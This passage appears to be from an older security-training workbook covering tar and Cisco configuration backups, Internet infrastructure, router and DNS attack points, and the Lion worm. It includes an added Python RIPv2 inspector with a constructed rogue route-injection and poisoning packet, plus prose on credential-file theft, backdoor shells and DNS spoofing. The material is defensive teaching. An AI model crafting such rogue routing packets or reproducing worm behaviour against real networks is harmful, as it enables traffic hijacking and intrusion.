If you just wanted to create an archive of two files (abc.txt and def.txt) as a single file called abcdef.tar on your hard drive, you could use the following command:

tar -cf abcdef.tar abc.txt def.txt

Another useful command to know is the find command. With the appropriate switches, it can be used to find files that were created or modified within the last day (24 hours), as shown here. GNU find defaults to the current directory when no starting path is given; other versions require one, so add a . after find if you get an error:

find -mtime -1 -type f -print

If you run tar and, instead of specifying individual files, enclose this find command in backquotes (grave accents), the output of the find command is substituted on the command line and those files are tarred. (On a U.S. keyboard the backquote is to the left of the numeral 1; the single quote to the right of the semicolon is not the one you want. Modern shells also accept the $(...) form, which is easier to read.) One caveat: the shell splits the substituted output on whitespace, so a file name containing spaces is passed to tar as several separate names.


So, if you were scheduling an incremental backup every day, you would, on the first day, tar all the files you wanted to archive (maybe to a tape); then, on subsequent days, you would tell tar to archive only those files that changed on that day.

TASK 6D-23

Using the tar Command for Incremental Backups

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root, and open a Terminal Window.

2. Create a directory called tartest, and then change to that directory.

3. Enter touch abc.txt to create a file.

4. Enter touch def.txt to create another file.

5. Enter find -mtime -1 -type f -print to find files that have been created or changed within the last day. You should be shown a list of the two files you just created.

6. Enter tar -cf abcdef.tar `find -mtime -1 -type f -print` to tar the results of the find command. Remember that both of the quotes need to be backquotes (grave accents). An uncompressed tar archive called abcdef.tar will be created for you.

7. Verify that the new tar file was created (for example, with tar -tf abcdef.tar to list its contents), and close the Terminal Window.
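The task above, like the find -mtime -1 approach the text describes, keys the incremental on "changed in the last 24 hours" and passes file names through the shell, which splits them on spaces. The following is an added example, not from the course, that keeps the same normal-then-incremental model but anchors each incremental to the moment the previous backup started, using Python's tarfile module in place of the tar command. The directory names, the marker file name and the sample files are assumptions; the restore replays the archives in the same order as the Windows task earlier in this topic (the full backup, then each incremental in sequence).

```python
"""Timestamp-driven incremental backups with Python's tarfile module (added example)."""
import os
import tarfile
import time
from pathlib import Path

MARKER = ".last_backup"   # assumed name of the file that records when the last backup started


def _files_under(src: Path):
    """Yield every regular file below src (symlinks are archived as links, not followed)."""
    for root, _dirs, files in os.walk(src):
        for name in files:
            yield Path(root) / name


def backup_full(src: str, dest: str) -> str:
    """Archive everything under src into dest/full.tar and start the marker clock.

    Keep dest outside src, or the marker and the archives end up inside the next backup.
    """
    src, dest = Path(src), Path(dest)
    dest.mkdir(parents=True, exist_ok=True)
    started = time.time()          # taken BEFORE the walk: a file changed mid-backup is caught next time
    archive = dest / "full.tar"
    with tarfile.open(archive, "w") as tar:
        for path in _files_under(src):
            tar.add(str(path), arcname=str(path.relative_to(src)))
    (dest / MARKER).write_text(repr(started))
    return str(archive)


def backup_incremental(src: str, dest: str) -> list:
    """Archive only files modified since the marker into dest/incr_NNNN.tar.

    Returns the relative names archived (an empty list, and no archive, if nothing changed).
    Comparing mtimes against the marker replaces 'find -mtime -1': the window is anchored to the
    previous backup rather than to the last 24 hours, so a skipped night does not lose a day of changes.
    """
    src, dest = Path(src), Path(dest)
    marker = dest / MARKER
    since = float(marker.read_text())   # raises if no full backup exists yet
    started = time.time()
    changed = [p for p in _files_under(src) if p.stat().st_mtime > since]
    if changed:
        seq = len(list(dest.glob("incr_*.tar"))) + 1
        with tarfile.open(dest / f"incr_{seq:04d}.tar", "w") as tar:
            for path in changed:
                tar.add(str(path), arcname=str(path.relative_to(src)))
    marker.write_text(repr(started))
    return [str(p.relative_to(src)) for p in changed]


def restore_all(dest: str, target: str) -> list:
    """Replay full.tar, then each incremental in sequence, so later versions overwrite earlier ones."""
    dest, target = Path(dest), Path(target)
    target.mkdir(parents=True, exist_ok=True)
    order = [dest / "full.tar"] + sorted(dest.glob("incr_*.tar"))
    for archive in order:
        with tarfile.open(archive) as tar:
            try:
                # The 'data' filter rejects absolute paths and '..' members (Python 3.12+, backported to patched 3.8+).
                tar.extractall(target, filter="data")
            except TypeError:
                tar.extractall(target)   # older Python has no filter: restore only archives you created yourself
    return [str(a) for a in order]


if __name__ == "__main__":
    # Constructed demo in a scratch directory; nothing outside it is touched.
    import tempfile
    base = Path(tempfile.mkdtemp())
    (base / "src").mkdir()
    (base / "src" / "Weekend.txt").write_text("weekend\n")
    print(backup_full(base / "src", base / "bak"))
    time.sleep(1.1)                  # keep mtimes distinguishable on filesystems with 1-second timestamps
    (base / "src" / "Monday.txt").write_text("monday\n")
    print(backup_incremental(base / "src", base / "bak"))   # ['Monday.txt']
    print(restore_all(base / "bak", base / "restored"))
```

The marker is written after the archive closes but records the time the walk began, so a file modified while tar was running is picked up again by the next incremental; duplicating a file across two archives is harmless, missing one is not.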

Backup Strategies for Cisco Routers

Earlier in the Cisco router lesson, you looked at router configuration information. A router's running configuration (running-config) lives in RAM; copy running-config startup-config saves it to NVRAM as the startup configuration (startup-config), while flash holds the IOS image. These configuration files are typically uploaded to or retrieved from tftp servers somewhere on the network. A lot of work goes into configuring a production router, and the configuration, including any access lists and the password hashes it contains, must be treated as sensitive information. As such, it should be backed up to removable media and stored in a secure location. The typical method of backing up a configuration file is to upload it to a tftp server. Keep in mind that tftp has no authentication and no encryption, so the transfer should take place only over a trusted management network; where the IOS version supports it, copying the configuration over SSH (copy running-config scp:) avoids exposing it on the wire.

Cisco has a tftp server available for use on a Windows 9x/NT machine from their Web site at www.cisco.com/pcgi-bin/tablebuild.pl/tftp. You must accept the Software License Agreement before downloading the tftp server software. Other tftp servers are also available, such as the one from the Solarwinds Web site. Of course, you can simply implement the Remote Installation Service (RIS) for Windows 2000, then turn on the tftp daemon service to make your Windows 2000 Server into a tftp server, but this will work only on Windows 2000 Server. In order to implement the full-fledged RIS, you must have a Windows 2000 domain, but for the purposes of this exercise it does not matter; we just need RIS to be able to include the tftp service.

Instructor note for Task 6D-23, step 5: make sure students type the numeral 1 (not the letter l) in the -mtime -1 argument.


Once you have a tftp server, you can issue the appropriate commands on the Cisco router to upload its configuration information to the tftp server. After the file is uploaded, you can take it off the server and put it on a floppy disk for safekeeping. If you want to make this information more secure, you can encrypt the file by using PGP or any other encrypting tool.

For the purposes of the subsequent tasks, you will implement the built-in tftp solution in Windows 2000 Server.

TASK 6D-24

Backing Up Cisco Router Configurations

Setup: You are logged in to Linux as root.

1. Log on to Windows 2000 Server as the renamed Administrator account.

2. Open the Add/Remove Programs Control Panel.

3. Click Add/Remove Windows Components, and wait for a few seconds.

4. Scroll down the list, check Remote Installation Services, and click Next.

5. When prompted, provide the path to the Windows 2000 installation files.

6. Click OK.

7. Click Finish, and then click Yes to restart the computer. Then, log back on to Windows 2000 as the renamed Administrator account.

8. From the Start menu, choose Programs→Administrative Tools→Services.

9. In the right pane, scroll down and look for the Trivial FTP Daemon Service.

10. Right-click this service, and choose Start.

11. Close the Services console.

12. Open Windows Explorer.

13. Expand your boot partition. You should see a folder called tftpdroot. Double-click this folder. This is the folder where anyone tftp-ing to your server would place their files. Leave Explorer open.

14. Open a command prompt, and enter netstat -a to verify that your machine is listening on the tftp port (UDP port 69). You have just set up a tftp server. Remember that anyone who can reach this port can read from and write to tftpdroot without a password, so stop the service again when the exercise is over.

15. Telnet to your router, or use SSH, if it is enabled.

16. Switch to Enable Mode.

17. Enter copy running-config tftp (IOS also accepts the abbreviation copy ru tftp) to begin copying the configuration file.

PGP (Pretty Good Privacy): A freeware program primarily for secure electronic mail.

Instructor note: If you need to create user accounts for students on the router, use the username command in a console session.


18. When prompted for the address or name of the remote host, enter your computer's IP address. Next, you will be prompted for a destination file name.

19. Press Enter to accept the default file name.

20. Wait a few seconds, and your configuration will be copied over to the tftp server.

21. Close the remote router session.

22. Switch to Explorer.

23. Verify that there is a file called left-config (or right-config, as the case may be) in the tftpdroot folder.

24. Double-click this file and open it in WordPad. You can see the router's entire configuration in this file. In a production environment, you would protect this file very carefully by moving it to removable media and storing the media in a safe place.

25. Close all open windows.

Summary

In this lesson, you looked at various types of disasters that could befall an organization and put it out of commission, unless the organization had already implemented some form of business continuity planning. You looked at how such plans could be developed and tested. You looked at technologies to keep you powered on, backup strategies for operating systems, and products that can be used in various situations.

Lesson Review

6A Broadly speaking, what are the two types of disasters that can affect a business?

Natural disasters and man-made disasters.

List the two basic parts to a quantitative risk analysis.

The probability of a threat occurring and the estimated loss that will result from the threat.

6B What must be undertaken by a company before creating a contingency plan?

A risk analysis.

Before a contingency plan is put to effect, what must be done?

It must be tested.


What are the three types of tests that are typically carried out on a contingency plan?

• Simulated testing on paper (or check list test).

• Limited environment simulation (or structured walk-through test).

• Full scale environment simulation (or full interruption test).

6C Voltage stabilizers can be used to combat what kind of electrical disturbances?

Spikes, surges, and sags.

Generators can be used to combat what kind of electrical disturbances?

Blackouts.

List at least three fuel types for conventional combustion-type electrical generators (other than diesel, propane, kerosene, and gasoline).

Responses might include CNG, LNG, methanol, and ethanol.

6D What are the minimum number of disks required to implement RAID5?

Three.

What is the disk-utilization percentage for RAID 10?

50 percent.

List some of the requirements for a hot site:

Responses might include:

• Hot sites are practically a working replica of your server and client configurations.

• The company uptime at the hot site should be achieved in a matter of hours, not days.

Broadly speaking, what are the three types of backups implemented by most system administrators?

Normal, differential, and incremental.

The Archive bit is the sixth bit in the attribute byte.

What is the essential difference between a differential backup and an incremental backup?

A differential backup does not clear the archive bit on the files it backs up, so each differential contains everything changed since the last normal backup; an incremental backup clears the bit, so it contains only what changed since the previous backup of any kind.


LESSON 7

Security on the Internet and the WWW

Overview

In this lesson, you will learn how to identify the issues associated with Internet and World Wide Web security. You will detail the major components of the Internet and their functions. Following a look at the components of the Internet, you will examine how hackers attack these components and how they target Web sites. The lesson ends by detailing the areas of Internet security that are related to individual users.

Objectives

In this lesson, you will:

7A Identify the major components of the Internet.

In this topic, you will identify the pieces of the Internet that are actually used to run the Internet and the organizations that govern them.

7B Examine the attacks used against Web servers.

In this topic, you will examine the techniques used in attacks on Web servers and Web sites.

7C Identify the attack points on the Internet.

In this topic, you will identify the areas of the Internet where attacks have the highest probability and what those attacks are likely to be.

7D Identify risks that the Internet user faces.

In this topic, you will identify the techniques used to attack the users of the Internet, in contrast to attacks against the Internet itself.

Data Files

simple.htm

Lesson Time

4 hours


Topic 7A

Describing the Components of the Internet

For us to have a valid discussion about the Internet and the World Wide Web, it is critical that you have solid knowledge of the components of the Internet. The major components that we will discuss are the Backbone and NAPs (Network Access Points), ISPs (Internet Service Providers), and DNS (Domain Name Service).

The Backbone (or Layer 1 of the Internet)

We know it as the Internet and the World Wide Web. The Internet is loosely defined by some as a packet-switched network of networks, not owned by any one country, government, or organization; rather, it is a voluntary-use network. The physical layer of the Internet itself involves many types of physical media (wired and wireless), and therefore many types of access methods.

The Internet Backbone itself is a very high-speed interconnection of networks and has three major components: Network Service Providers, Long Distance Carriers, and Network Access Points.

Two excellent Web sites that attempt to explain and illustrate the physical aspects of the Internet, along with myriad other issues surrounding the Internet's history and future, are www.cybergeography.com/ and www.telegeography.com/.

Figure 7-1: A graphical representation of the Backbone over the United States. Picture courtesy of the National Center for Supercomputing Applications (NCSA).



Network Service Providers (NSPs)

Network Service Providers, sometimes called peering centers, are the organizations that provide the foundation level of the Internet Backbone. An NSP provides national or international interconnecting Internet services to Regional Network Providers and to large Internet Service Providers, via Network Access Points. There are guidelines to be met for an organization to be considered an NSP, such as:

• Minimum DS-3 bandwidth rates.

• Three interconnection points to NAPs.

• Routing of both ISO 8473 (CLNP) and IP packets.

• Service availability of 99.92 percent uptime, with further requirements of no more than 7 hours per year of outage and a time to service restoration of 2.5 hours.

Long Distance Carriers

The Long Distance Carriers are the providers of the physical network of communication channels for the Internet and voice/data applications. The general method is for a NAP to contract with a Long Distance Carrier to provide the channels for backbone communication. Four major LDCs are listed below:

• AT&T uses Frame Relay circuits at both DS-1 and DS-3 speeds, along with a hybrid Asynchronous Transfer Mode (ATM) network.

• Sprint provides DS-1 and DS-3 speeds on its primarily fiber network. Sprint also uses FDDI for router interconnection.

• WorldCom International, a division of MCI WorldCom, uses a fiber and digital microwave network to provide DS-1 and DS-3 speeds.

• Hughes Network Systems provides backbone bandwidth via satellite communication.

NAPs

NAPs (Network Access Points) provide the actual means for ISPs and NSPs to interconnect. The only restrictions on traffic flow are those that result from agreements between the ISPs and NSPs (or legal requirements). ISPs and NSPs are required to have at least one bilateral agreement with a different ISP or NSP in order to attach to the NAP. In the United States, there are six major NAPs, known as Priority Network Access Points, plus other non-priority NAPs:

• Sprint, located in Pennsauken, NJ.

• AmeriTech Advanced Data Services, located in Chicago, IL.

• MFS Communications, located in:

— Washington, DC

— San Jose, CA

— Dallas, TX

— Frankfurt, Germany

— Paris, France

• PacBell, located in:


— Los Angeles, CA

— San Francisco, CA

• Federal Internet Exchange, known as FIX-West.

• Digital Internet Exchange, located in Palo Alto, CA.

ISPs at Work

When it comes to actual users connecting to the Internet, they need some type of local access. This is where the whole ISP (Internet Service Provider) system comes into focus. A common analogy for ISPs is that they are the providers of the "dial tone" for the Internet. With the ever-present mergers and acquisitions of ISPs, it is hard to keep up with all of the players. Instead, we will quickly look at the ISP system.

Clearly, not every ISP can have a direct connection to the Backbone; there would be too many connections, and the overall efficiency of the Internet would suffer greatly. Instead, there is a tiered system, where one ISP feeds off another. The three levels of ISP are generally classified as follows:

• Tier One: These ISPs have their own nationwide backbone and connect to a NAP. They also have over 1,000,000 subscribers.

• Tier Two: These ISPs obtain their bandwidth from Tier One and have a local or regional backbone network. They have at least 50,000 subscribers and provide state or national service.

• Tier Three: These ISPs obtain their bandwidth from Tier Two and provide local services only. They generally have fewer than 50,000 users.

Figure 7-2: A graphical representation of the ISP tier system and connections.

Just to be clear, there are no industry-agreed-upon guidelines on tier classification; the figures above are for reference only.


The Organizations that Help Run the Internet (or Layer 8 of the Internet)

For the Internet, there is no single management authority; instead, there are several groups involved in the infrastructure and management of the Internet. These organizations work together to ensure that the Internet remains operational and functions at the highest levels of available efficiency.

The following are the main groups:

• Internet Engineering Task Force (IETF). The IETF is a large open international community of network designers, operators, vendors, and researchers concerned with the evolution of the Internet architecture and the smooth operation of the Internet. It is open to any interested individual.

• Internet Society (ISOC). The ISOC is a non-profit and nongovernmental professional organization that coordinates the usage of Internet applications and protocols. Membership in the ISOC is required.

• Internet Architecture Board (IAB). The IAB is responsible for defining the overall architecture of the Internet, providing guidance and broad direction to the IETF. The IAB also serves as the technology advisory group to the ISOC and oversees a number of critical activities in support of the Internet.

• Internet Assigned Numbers Authority (IANA). The IANA, operating out of the University of Southern California, is chartered by the ISOC and the Federal Networking Council to function as the central coordinator for the assignment of IP addresses and management of the Root Domain Name Service.

• The Internet Corporation for Assigned Names and Numbers (ICANN). ICANN, a non-profit corporation formed in 1998, presently assumes the following responsibilities: IP address space allocation, protocol parameter assignment, DNS and root server system management, as well as management functions previously performed under U.S. Government contract by IANA and other entities.

• Internet Engineering Steering Group (IESG). The IESG is responsible for technical management of IETF activities and the Internet standards process. The IESG is directly responsible for the actions associated with entry into and movement along the Internet standards track, including final approval of specifications as Internet standards.

• Council of Registrars (CORE). CORE provides the international framework in which the policies for administration and enhancement of the Internet Domain Name Service are developed and implemented.

• Network Information Centers (NIC). The NICs around the globe are organizations that perform Registry and Registrar functions associated with Domain Names.

The chart shown in Figure 7-3 will help you understand the position of these different organizations according to the roles they play.



Figure 7-3: ICANN organizational chart.

DNS Revealed

Simple connection via an ISP may be enough to use the Internet, but most users also want to experience the World Wide Web. Because the Web uses names and the Internet uses numbers, there must be a translation between the two at some point along the way. This is where DNS comes in. Using a distributed, hierarchical database (zone data, traditionally kept in plain-text zone files) maintained on Domain Name Servers around the world, users can browse using names instead of numbers.


The organization that keeps track of all of the names and numbers associated with DNS is IANA. IANA acts as the central coordinator for assignment of IP addresses and manages the Root Domain Name Service. Additionally, at the time of writing there are three regional organizations around the world that assign IP addresses:

• ARIN: The American Registry for Internet Numbers operates in the Americas and sub-Saharan Africa.

• RIPE NCC: The Réseaux IP Européens Network Coordination Centre operates in Europe, the Middle East, Central Asia, and North Africa.

• APNIC: The Asia-Pacific Network Information Center operates in Asia and Australia.

The DNS servers that provide the top level of name resolution are called the Root servers. There are currently 13 Root level DNS servers. Their names, locations, and IP addresses are shown in Figure 7-4.

Figure 7-4: A table of the Root DNS servers on the Internet.

Figure 7-5 shows the physical locations of the Root DNS servers on the Internet.

Figure 7-5: A map showing the physical locations of the Root DNS servers. Image from the World Internetworking Alliance (WIA), www.wia.org.



These Root servers are perhaps the most important systems on the Internet today. Root Servers A through M are run by a dozen different operators (companies, universities, non-profit organizations, and U.S. government agencies), most of them located in the United States at the time of writing. To prevent a single exploit from compromising the entire system, the Root servers run a variety of operating systems and DNS software rather than one common build. So critical is proper DNS operation to the global economy that the hosting locations are kept under strict physical access controls. Recent attacks via the Internet that tried to cripple these servers (such as the DDoS of October 2002) failed to have a significant impact on the Internet because of the built-in redundancy. To increase fault tolerance, discussions are under way to populate the Internet with a few more Root server instances, hosted in the Asia-Pacific region. To begin the process, Root Server F in California will be mirrored to a location in Asia so as to reach the largest possible base of Internet users.

TASK 7A-1

Defining Internet Components

1. Discuss, with at least one other student, the principles of the Internet design.

2. After your discussion, diagram as much of the physical layout of the Internet as possible. Make your diagram as detailed as possible, including as many components as you can think of, using this text for reference only when necessary.

Topic 7B

Identifying the Weak Points of the Internet

So if the Internet servers are so well secured, and the ISP/NAP combinations have at least three connection points, the redundancy of the Internet seems, by design, to make hacking it a difficult task. To some this may be true, but to others it presents a challenge. So, where would a hacker attack? At what point is the Internet itself vulnerable? Hackers have several options, none of which are as easy as targeting a neighbor or small business down the street. The options of attack become the infrastructure itself, instead of a particular host or network.

Imagine this: There is a person who is trying to damage business X, a retail business. Business X has solid physical security inside, and people shop there no matter how loudly this person yells at them to stop. Out of frustration, one day he goes into the revolving door of business X and jams it so that it cannot revolve. He does this to all three revolving doors until there is no way in or out of business X. Did he compromise any internal systems, or even attempt to break into them? Not one. Has he damaged the business? Absolutely.

This is similar to the difficult issue of securing the infrastructure of the Internet. There are so many revolving doors, so to speak, that can be broken. It may not be necessary to actually "get inside" to be able to damage a mission-critical system.

fault tolerance: The ability of a system or component to continue normal operation despite the presence of hardware or software faults.

hacking: Unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network.


Targeting the Routers

One of the potential targets on the Internet is the physical routers: the devices that carry traffic on the Backbone of the Internet. Backbone routers work somewhat differently from the everyday routers used in most organizations. They are default-free core routers, meaning they hold no default route and must carry a full routing table instead; they learn routes dynamically through BGP (Border Gateway Protocol). If the owner of an address block changes ISPs, the routes to that owner change. Backbone routers accept BGP messages only from explicitly configured peers, which in practice means the largest Tier One ISPs. If a hacker finds a Backbone router that will accept BGP sessions or announcements from an unexpected source, that is where he or she will attempt to inject false routing data into the tables.

If the hacker is unable to inject false routing data, he or she may resort to DoS (Denial of Service) simply to prevent the router from operating as designed.

An easier place for router attacks is not on the Internet itself, but in local network routers. If a router is using RIP (Routing Information Protocol) without authentication, a hacker can inject data into the routing tables with ease. RIPv1 uses UDP packets for the exchange of data and has no authentication mechanism at all; RIPv2 supports simple-password and keyed MD5 authentication (RFC 2082), but many installations leave it off. This means that any attacker on the segment can inject false routes into the routing tables, and the false routes will then be propagated around the RIP network.
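As an added example (not from the course), here is the check a passive sensor, or a script reading RIP traffic from UDP port 520, can apply to each advertisement it sees. An update that lacks keyed MD5 authentication, comes from a host that is not a configured neighbor, injects a default route, or poisons a prefix the network depends on is exactly the injection the paragraph above describes. The neighbor list, the protected prefix and both sample packets are constructed for the example; the MD5 digest trailer is not modeled, so the code checks only that keyed authentication is present, where a real sensor would also verify the digest with the shared key.

```python
"""RIPv2 advertisement inspection: flag updates a sensor on UDP port 520 should not see (added example)."""
from __future__ import annotations
import struct
from ipaddress import IPv4Address, IPv4Network

RIP_RESPONSE = 2      # command 2 = response (an advertisement); 1 = request
AF_INET = 2
AFI_AUTH = 0xFFFF     # RFC 2453 / RFC 2082: an entry carrying authentication instead of a route
AUTH_MD5 = 3          # keyed MD5; type 2 is the clear-text "simple password"
INFINITY = 16         # RIP metric meaning "unreachable", the value used for route poisoning


def parse_rip(payload: bytes) -> dict:
    """Split a RIP datagram into its 4-byte header, optional auth entry and 20-byte route entries."""
    if len(payload) < 4 or (len(payload) - 4) % 20:
        raise ValueError("malformed RIP packet")
    command, version, _zero = struct.unpack("!BBH", payload[:4])
    pkt = {"command": command, "version": version, "auth": None, "routes": []}
    for off in range(4, len(payload), 20):
        afi, tag = struct.unpack("!HH", payload[off:off + 4])
        if afi == AFI_AUTH:
            # With MD5 a second 0xFFFF entry trails the packet carrying the digest; keep the first (the header).
            if pkt["auth"] is None:
                pkt["auth"] = {"type": tag, "data": payload[off + 4:off + 20]}
            continue
        ip, mask, next_hop, metric = struct.unpack("!4s4s4sI", payload[off + 4:off + 20])
        pkt["routes"].append({
            "prefix": IPv4Network(f"{IPv4Address(ip)}/{IPv4Address(mask)}", strict=False),
            "next_hop": str(IPv4Address(next_hop)),   # 0.0.0.0 means "use the packet's source address"
            "metric": metric,
        })
    return pkt


def inspect_rip(src_ip: str, payload: bytes, neighbors: set, protected: set) -> list:
    """Policy checks for one advertisement; neighbors and protected prefixes are the assumed local policy."""
    findings = []
    pkt = parse_rip(payload)
    if pkt["command"] != RIP_RESPONSE:
        return findings                                   # requests carry nothing to poison with
    if src_ip not in neighbors:
        findings.append(f"advertisement from non-neighbor {src_ip}")
    if pkt["version"] < 2:
        findings.append("RIPv1 packet: no authentication is possible at all")
    elif pkt["auth"] is None or pkt["auth"]["type"] != AUTH_MD5:
        findings.append("RIPv2 update without keyed MD5 authentication")
    for r in pkt["routes"]:
        key = str(r["prefix"])
        via = src_ip if r["next_hop"] == "0.0.0.0" else r["next_hop"]
        if r["prefix"].prefixlen == 0:
            findings.append(f"default route injected via {via} with metric {r['metric']}")
        if key in protected and r["metric"] >= INFINITY:
            findings.append(f"route poisoning: {key} advertised as unreachable")
        if not 1 <= r["metric"] <= INFINITY:
            findings.append(f"invalid metric {r['metric']} for {key}")
    return findings


def build_rip_response(routes, version: int = 2, auth=None) -> bytes:
    """Encode an advertisement; routes = [(prefix, next_hop, metric)], auth = (type, up to 16 bytes) or None."""
    pkt = struct.pack("!BBH", RIP_RESPONSE, version, 0)
    if auth is not None:
        atype, data = auth
        pkt += struct.pack("!HH", AFI_AUTH, atype) + data.ljust(16, b"\x00")[:16]
    for prefix, next_hop, metric in routes:
        net = IPv4Network(prefix)
        mask = net.netmask.packed if version >= 2 else b"\x00" * 4   # RIPv1 carries no mask
        pkt += struct.pack("!HH4s4s4sI", AF_INET, 0, net.network_address.packed, mask,
                           IPv4Address(next_hop).packed, metric)
    return pkt


# Constructed sample traffic (not captured data). Assumed policy: 10.0.0.2 is the only RIP neighbour
# and 10.1.0.0/16 is a prefix that must stay reachable.
NEIGHBORS = {"10.0.0.2"}
PROTECTED = {"10.1.0.0/16"}
GOOD_UPDATE = build_rip_response([("10.1.0.0/16", "0.0.0.0", 2)],
                                 auth=(AUTH_MD5, b"\x00\x2c\x01\x10"))   # MD5 header: length, key id, auth len
ROGUE_UPDATE = build_rip_response([("0.0.0.0/0", "10.0.0.99", 1),          # "send everything to me"
                                   ("10.1.0.0/16", "0.0.0.0", INFINITY)])  # "and the real prefix is gone"

if __name__ == "__main__":
    for src, pkt in (("10.0.0.2", GOOD_UPDATE), ("10.0.0.99", ROGUE_UPDATE)):
        print(src, inspect_rip(src, pkt, NEIGHBORS, PROTECTED) or ["ok"])
```

The same checks translate directly into router configuration: configure RIPv2 with keyed MD5 on every interface that runs it, make interfaces towards untrusted segments passive, and filter the prefixes you are willing to learn so that a default route or a poisoned internal prefix is dropped before it reaches the routing table.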

Figure 7-6: An example of some of the locations from which a hacker can inject RIP updates into a network.


Targeting the ISPs

The way for a hacker to reach the maximum number of potential targets in the shortest time is to break into an ISP. By compromising an ISP, a hacker can have access to thousands of targets almost at once. This potential is overwhelming for some hackers, so the ISP is their primary target. Often the hacker will not try to damage the ISP itself and will try to remain as unnoticed as possible; the hacker is interested only in the user data. User names, passwords, and IP addresses can be compromised.

Targeting DNS

This is perhaps the biggest risk area of the Internet. It is not technically a single point of failure, since the Root DNS servers run different operating systems on various hardware platforms in various physical locations, but it is nevertheless a strong target. There have been many DNS vulnerabilities over the years, one of the most current being the BIND (Berkeley Internet Name Domain) attacks starting March 22, 2001.

The Lion Worm

On that day in March, IDS sensors all over the world were picking up massive numbers of requests to port 53 (DNS). A worm was soon found, named Lion, which used the BIND hole to attack DNS servers. One regional analysis of port 53 probes saw the number jump from 200 probes per day, prior to March 22, to 50,000 probes on that day.

The Lion worm is very similar to a different worm named Ramen; however, Lion was much more dangerous and needed to be taken seriously. It infected Linux machines running the BIND DNS server. The BIND versions affected were 8.2, 8.2-P1, 8.2.1, and 8.2.2-Px; BIND 8.2.3-REL and BIND 9 were not vulnerable.

The Lion worm spread using a scanner called pscan, driven by randb, which generated random class B networks to probe on TCP port 53. After a system was targeted, the worm checked whether it was vulnerable. If it was, the BIND exploit was executed and the t0rn rootkit was installed.

Once the rootkit was installed, it sent off the contents of /etc/passwd and /etc/shadow, along with some network settings, to an address in the china.com domain. It would then delete /etc/hosts.deny, lowering some of the built-in protection afforded by TCP wrappers. Ports 60008/tcp and 33567/tcp were given a backdoor root shell (via inetd; see /etc/inetd.conf), and a Trojaned version of SSH was placed on 33568/tcp. Syslogd was then killed, so logging on the system could no longer be trusted.

To continue, a Trojaned version of login was installed, which looked for a hashed password in /etc/ttyhash. Finally, /usr/sbin/nscd (the optional Name Service Caching daemon) was overwritten with a Trojaned version of SSH.

So, does this strike you as a serious threat? It should! All of this was possible simply by locating DNS servers running the affected versions of BIND. This is an example of attacking the infrastructure directly.

probe: Any effort to gather information about a machine or its users for the apparent purpose of gaining unauthorized access to the system at a later date.

rootkit: A hacker security tool that captures passwords and message traffic to and from a computer. A collection of tools that allows a hacker to provide a back door into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. A rootkit is a classic example of Trojan Horse software. Rootkits are available for a wide range of operating systems.


DDoS of the Internet

Instead of launching a specific exploit against the DNS system, a hacker can target DNS via a DDoS (Distributed Denial of Service). While a DDoS attack against DNS servers is under way, no real data can be exchanged. The end result is that DNS servers will not be able to update their DNS entries, and host-name resolution may cease for those servers' clients.

DDoS takes advantage of the inherent communication channels of the Internet. In order for us to communicate, we must have open channels. If those channels fill with useless traffic, then when we need to communicate, there are no open channels to do so. This is essentially the function of DDoS.

One of the main tools used in DDoS attacks is called TFN2K, or Tribe Flood Network 2000. TFN2K can flood the network with TCP, UDP, or ICMP packets (or a mix of all three at the same time). Additionally, TFN2K can spoof the source IP address, making for difficult investigative work in response to an attack.

If a hacker is going to go after the serious infrastructure of the Internet, there is no better choice than DNS itself.

Figure 7-7: A graphical example of the position of elements for a simple DoS attack.


TASK 7B-1

Identifying Weak Points of the Internet

1. Using your diagram from Task 7A-1 for reference, identify the points of attack of the Internet, and the methodologies that could be used to attack these points.

2. List the possible attack points and methods you have defined.

DNS SecurityBecause the DNS servers are perhaps the most critical component of the Internet,their security is paramount. There are several different areas in which attackerscommonly will go after a DNS server. They are pulling Zone Transfer traffic andDNS Spoofing.

Zone Transfers

When it comes to DNS and security on the Internet, one of the first issues to address is the issue of Zone Transfer traffic. Zone Transfer traffic is the name of the data sent from a DNS server that is responsible for an area, or zone, to a secondary server that will assist with name resolution.

The reason this is critical, from a security perspective, is that in this transfer traffic are names of computers and their IP addresses. Additionally, depending on the configuration of the master DNS server, the data is likely to include the type of machine, such as a mail server. So, if an attacker is trying to identify the targets in a particular network, the zone transfer traffic may identify all the machines.

Where this is most important is the DNS server that provides name resolution to both public and private addresses. In the event an attacker is able to get the zone transfer traffic of this DNS server, the attacker will have the entire internal network mapped, by hostname, IP address, and some services.

There are two basic types of Zone Transfer traffic. The first is called All-zone, and this transfer is when all the names that the master DNS server is aware of are sent to the secondary DNS server—in other words, everything the DNS server knows about name resolution. In the DNS server, this is called an AXFR transfer.

The second type of transfer is called an Incremental transfer. The Incremental transfer, instead of containing all that a DNS server knows, will contain only that information that is new or changed since the last transfer. This is a more efficient way of exchanging zone data. In the DNS server, this is called an IXFR transfer.

So an attacker may pretend to be a legitimate secondary DNS server and request the master DNS to transfer the zone information. For this reason, it is strongly advised that all master DNS servers are configured to allow transfer traffic to go only to authorized secondary DNS servers.

DNS Spoofing

Companies that do all of their business on the Internet must be vigilant in the protection of their Web sites. However, for most organizations, the ability to protect the Web site stops at the Web site. Generally, the organization does not have control over the ISP, the routers, or the DNS of the Internet. What would happen if the DNS server that is used to identify the organizational Web site were to suddenly point to the wrong Web site?

This type of thing has happened, and it is something that an organization must watch out for. The ability to redirect a DNS server to point a client to an incorrect resource is very serious. Imagine that an attacker had taken the time to pull every page from the organization’s Web site, could re-create the site in its entirety, and was to redirect legitimate requests for this Web site to the cloned site that the attacker is running. If this Web site takes credit card numbers, it becomes a very serious situation.

There are several different methods of DNS spoofing:

• DNS Cache Poisoning. In DNS Cache Poisoning, an attacker sends fake mapping information to the DNS server, and the server enters this false name information as legitimate DNS data. When a client asks the DNS server to resolve a name that has been falsely entered in the DNS server, there is no way for the client to know that the information is incorrect. By doing this, the attacker is able to send the client to an incorrect machine.

• Spoofing the DNS Response. In Spoofing the DNS Response, the attacker sits between the DNS client and the legitimate DNS server. When the attacker notices a DNS request on the wire, a false response is sent to the client (from the attacker) before the legitimate DNS server can reply. By doing this, the attacker is sending the client to an incorrect machine.

• DNS Server Compromise. The third spoofing option is for complete DNS Server Compromise. In this case, the attacker has taken control of a legitimate DNS server and has directly inputted false data. The client makes a DNS request to the server, and the server replies just as it is designed to do.

The danger of a DNS server that has been compromised, combined with a duplicated Web site that requests credit card data, should be very obvious by now. One thing to maintain, as an organization, is careful logging and monitoring of Web traffic. In the event that all traffic stops, this may be cause for alarm.
